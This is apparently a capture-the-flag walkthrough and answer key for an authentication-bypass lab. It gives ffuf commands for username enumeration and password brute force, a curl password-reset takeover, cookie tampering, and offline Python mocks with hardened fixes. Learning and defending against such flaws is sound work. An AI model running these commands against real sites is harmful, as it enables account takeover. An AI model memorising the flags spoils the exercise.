Authentication Bypass

This guide contains the answers, and the steps needed to reach them, for the Authentication Bypass room.

Username Enumeration

  1. What is the username starting with si*** ?

The signup form leaks more information than it should: when a username is already taken it says so in the response, which turns the form into an oracle for valid accounts.

To abuse this, we can feed a names wordlist to ffuf, using the form field names taken from the page source. The -mr flag keeps only responses whose body matches the given regex, so only usernames that already exist are printed:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.47.167/customers/signup -mr "username already exists"

Answer: Simon

  1. What is the username starting with st*** ?

This was found with the above command.

Answer: Steve

  1. What is the username starting with ro**** ?

This was found with the above command.

Answer: Robert

Brute Force

  1. What is the valid username and password (format: username/password)?

After putting the discovered usernames into a text file we can combine it with a password wordlist in ffuf. Two wordlists in ffuf's default clusterbomb mode means every username is tried against every password, and -fc 200 filters out responses with status 200 (the login form re-rendered with an error), leaving only the successful login:

ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.47.167/customers/login -fc 200  

Answer: steve/thunder
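The two ffuf commands above rely on the same idea: a response that differs between valid and invalid input. The following Python script is an added example, not the room's code or the author's, and it runs offline against constructed mock endpoints (the user table, the wordlists and the 302-on-success behaviour of the login are assumptions that stand in for the real site). It replays the -mr enumeration and the clusterbomb -fc brute force, and puts a uniform-response version of the signup handler beside the leaky one so the fix is visible.

```python
import re
from typing import Callable, Iterable

# Constructed stand-ins for the room's user table and the SecLists wordlists
# (illustrative only; the real room data sits behind the ffuf commands above).
EXISTING_USERS = {"admin", "robert", "simon", "steve"}
NAMES_WORDLIST = ["aaron", "robert", "simon", "sophie", "steve", "zoe"]
PASSWORD_WORDLIST = ["123456", "password", "qwerty", "thunder"]
CREDENTIALS = {"steve": "thunder"}  # the valid pair found on this page


def signup_vulnerable(username: str) -> tuple[int, str]:
    """Mock signup handler that leaks account existence through its body.

    The response text differs depending on whether the username is taken,
    which is exactly what ffuf's -mr "username already exists" keys on.
    """
    if username.lower() in EXISTING_USERS:
        return 200, "An account with this username already exists"
    return 200, "Account created, check your email"


def signup_hardened(username: str) -> tuple[int, str]:
    """Mock signup handler with a uniform response.

    The lookup still happens, but status and body are identical either way
    (a real fix also evens out response time and rate-limits by source).
    """
    _taken = username.lower() in EXISTING_USERS
    return 200, "If the details were accepted you will receive an email"


def enumerate_usernames(endpoint: Callable[[str], tuple[int, str]],
                        wordlist: Iterable[str],
                        marker: str = "username already exists") -> list[str]:
    """Replay the ffuf -mr logic: keep candidates whose body matches marker."""
    return [name for name in wordlist if re.search(marker, endpoint(name)[1])]


def login(username: str, password: str) -> int:
    """Mock login returning only the status ffuf sees: 302 (redirect to the
    account page) on success, 200 (form re-rendered with an error) otherwise."""
    return 302 if CREDENTIALS.get(username.lower()) == password else 200


def brute_force(usernames: Iterable[str], passwords: Iterable[str],
                filter_codes: frozenset[int] = frozenset({200})) -> list[str]:
    """Replay ffuf's default clusterbomb mode with -fc: try every
    username/password combination and keep those whose status code is
    not filtered, returning them in the page's username/password format."""
    passwords = list(passwords)  # allow reuse across usernames
    return [f"{u}/{p}" for u in usernames for p in passwords
            if login(u, p) not in filter_codes]


if __name__ == "__main__":
    found = enumerate_usernames(signup_vulnerable, NAMES_WORDLIST)
    print("leaked by vulnerable signup:", found)
    print("leaked by hardened signup:  ",
          enumerate_usernames(signup_hardened, NAMES_WORDLIST))
    print("valid credentials:", brute_force(found, PASSWORD_WORDLIST))
```

Against the hardened handler the same marker never matches, so the enumeration step yields nothing and the brute force would have to run over the whole names list instead of three confirmed accounts; that is the practical effect of a uniform response.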

Logic Flaw

  1. What is the flag from Robert's support ticket?

The password reset form lets us reset someone else's password and have the reset email delivered to us: the email in the query string is used to find the account, while the email in the POST body is the one the reset link is sent to, and nothing checks that the two match.

curl "http://10.10.47.167/customers/reset?email=robert@acmeitsupport.thm" -H "Content-Type: application/x-www-form-urlencoded" -d "username=robert&email=1337h4ck3r@customer.acmeitsupport.thm"

The reset email arrives as a support ticket in our own account and contains the link that logs us into Robert's account.

Now we can read the flag from Robert's account.

Answer: THM{AUTH_BYPASS_COMPLETE}
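To make the logic flaw concrete, here is an added Python mock of the reset handler beside a fixed version. It is example code, not the room's implementation: the account table is constructed, the exact way the real application merges query-string and form parameters is an assumption, and the request it processes is the curl request from this page.

```python
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed account table using the room's domains; illustrative only.
ACCOUNTS = {"robert": "robert@acmeitsupport.thm"}


@dataclass
class Request:
    url: str   # full URL, including any query string
    body: str  # urlencoded POST body


@dataclass
class Outbox:
    """Records (recipient, reset token) for every email a handler sends."""
    sent: list = field(default_factory=list)


def _first(params: dict, key: str) -> str:
    return params.get(key, [""])[0]


def reset_vulnerable(req: Request, outbox: Outbox) -> str:
    """Mock of the flawed reset handler.

    The account is looked up with the email in the query string, but the
    reset link is sent to the email in the POST body. Nothing checks that
    the two agree, so an attacker can reset Robert's password and receive
    the link at an address they control.
    """
    query = parse_qs(urlsplit(req.url).query)
    form = parse_qs(req.body)
    username = _first(form, "username")
    if ACCOUNTS.get(username) != _first(query, "email"):
        return "No account found"
    token = secrets.token_hex(16)
    outbox.sent.append((_first(form, "email"), token))  # attacker-controlled
    return "Reset link sent"


def reset_fixed(req: Request, outbox: Outbox) -> str:
    """Hardened handler: resolve the account once, send only to the address
    stored for it, and never let the client name the recipient. The reply is
    the same whether or not the account exists, which also closes the
    enumeration channel."""
    form = parse_qs(req.body)
    stored_email = ACCOUNTS.get(_first(form, "username"))
    if stored_email is not None:
        outbox.sent.append((stored_email, secrets.token_hex(16)))
    return "If the account exists, a reset link has been sent"


# The request from the curl command on this page, as the handlers see it.
ATTACK = Request(
    url="http://10.10.47.167/customers/reset?email=robert@acmeitsupport.thm",
    body="username=robert&email=1337h4ck3r@customer.acmeitsupport.thm",
)


def recipient(handler, req: Request = ATTACK) -> str:
    """Run a handler on the request and report who received the reset link."""
    outbox = Outbox()
    handler(req, outbox)
    return outbox.sent[0][0] if outbox.sent else ""


if __name__ == "__main__":
    print("vulnerable handler mailed:", recipient(reset_vulnerable))
    print("fixed handler mailed:     ", recipient(reset_fixed))
```

The fix is not "validate the email harder"; it is to stop reading the recipient from the request at all. Once the account is resolved, the only address the server should ever use is the one on file.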

  1. What is the flag from changing the plain text cookie values?

The session state is kept in plaintext cookies, so the server trusts whatever values we send. We can use the following command to check whether we are treated as logged in:

curl http://10.10.47.167/cookie-test -H "Cookie: logged_in=true"

Adding a second cookie with the same kind of plaintext flag should also give us admin privileges:

curl http://10.10.47.167/cookie-test -H "Cookie: logged_in=true; admin=true"

Answer: THM{COOKIE_TAMPERING}

  1. What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

The hash is unsalted MD5, so a precomputed lookup works. Using CrackStation, we can get the string behind it.

Answer: 463729

  1. What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

To decode a Base64 string we can use CyberChef. Note that Base64 is an encoding, not encryption: anyone can decode and re-encode it.

Answer: THM{BASE64_ENCODING}

  1. Encode the following value using base64 {"id":1,"admin":true}

Encoding to Base64 can also be done with CyberChef.

Answer: eyJpZCI6MSwiYWRtaW4iOnRydWV9
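The cookie-tampering question and the Base64 questions above are the same lesson from two sides: a cookie that is merely encoded can be decoded, edited and re-encoded by the client. The following Python script is an added example, not code from the room, that builds the exact cookie value from the last question, forges admin on it, and then shows an HMAC-signed cookie on which the same forgery fails. The server key is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed server-side key; a real deployment loads it from a secrets store.
SERVER_KEY = b"example-key-do-not-use-in-production"


def encode_plain_cookie(session: dict) -> str:
    """Unsigned cookie: base64 of compact JSON, like the value the page
    encodes for {"id":1,"admin":true}. Base64 is encoding, not protection."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def decode_plain_cookie(cookie: str) -> dict:
    return json.loads(base64.b64decode(cookie))


def tamper(cookie: str, **changes) -> str:
    """What an attacker does with an unsigned cookie: decode, edit, re-encode."""
    session = decode_plain_cookie(cookie)
    session.update(changes)
    return encode_plain_cookie(session)


def is_admin_plain(cookie: str) -> bool:
    """Vulnerable check: trusts whatever the client sent."""
    return bool(decode_plain_cookie(cookie).get("admin"))


def encode_signed_cookie(session: dict, key: bytes = SERVER_KEY) -> str:
    """Hardened cookie: the same payload plus an HMAC-SHA256 tag over it."""
    payload = encode_plain_cookie(session)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def decode_signed_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[dict]:
    """Returns the session only if the tag verifies, None otherwise.
    compare_digest keeps the comparison constant-time."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_plain_cookie(payload)


def is_admin_signed(cookie: str) -> bool:
    """Hardened check: a tampered payload fails verification and is treated
    as no session at all, never as admin."""
    session = decode_signed_cookie(cookie)
    return bool(session and session.get("admin"))


if __name__ == "__main__":
    user = encode_plain_cookie({"id": 1, "admin": False})
    forged = tamper(user, admin=True)
    print("plain cookie, forged admin accepted:", is_admin_plain(forged))

    signed = encode_signed_cookie({"id": 1, "admin": False})
    payload, _, tag = signed.rpartition(".")
    forged_signed = f"{tamper(payload, admin=True)}.{tag}"
    print("signed cookie, forged admin accepted:", is_admin_signed(forged_signed))
```

Signing stops tampering but not reading: the payload is still plain Base64, so nothing secret belongs in it. For the room's logged_in=true / admin=true cookies the same applies: the fix is a server-side session keyed by an opaque identifier, or at minimum an integrity tag the client cannot compute.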